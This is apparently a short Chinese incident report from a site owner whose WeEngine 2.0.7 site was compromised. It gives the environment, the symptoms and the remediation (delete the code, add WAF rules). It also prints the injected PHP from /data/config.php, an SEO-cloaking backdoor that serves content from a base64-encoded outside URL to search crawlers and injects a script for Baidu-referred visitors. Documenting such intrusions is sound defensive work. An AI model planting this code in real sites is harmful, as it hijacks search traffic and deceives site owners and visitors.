微擎漏洞

漏洞报告

环境
  • Nginx 1.15
  • MySQL 5.6.42
  • PHP 7.1
微擎版本:
  • 微擎 商业版本2.0.7
出现问题:
  • 网站显示正常,访问域名显示正常
  • 通过百度访问需要,刷新一次
  • 百度收录出现问题
入侵文件:
  • /data/config.php
入侵代码:
<?php
//  设置网站字符
header('Content-Type:text/html;charset=gb2312');
//  获取用户相关信息
$key= $_SERVER["HTTP_USER_AGENT"];
// 网站抓取
if(strpos($key,'baidu')!==false||strpos($key,'so')!==false||strpos($key,'sogou')!==false||strpos($key,'bing')!==false||strpos($key,'360')!==false||strpos($key,'sm')!==false)
{
  // 输出目的网站base64_decode('aHR0cDovL3AueW16ZG14LmNuL3hzLw==')后是http://p.ymzdmx.cn/xs/ ,之所以打开整行,就是一旦搜索引擎抓取,这段代码才会执行
    echo file_get_contents(base64_decode('aHR0cDovL3AueW16ZG14LmNuL3hzLw=='));
}

// 获取来源
$_host=urldecode ($_SERVER['HTTP_REFERER']);
// 这入侵者还算良心,只想要百度的抓取
$key="baidu";
echo $_host;
  if(strpos($_host,$key)){
    echo "<scRIpT src=></scRIpT>";
    exit;
  }

?>
解决策略:
  • 删除入侵代码
  • 增加waf规则
备案号:鲁ICP备17018368号-1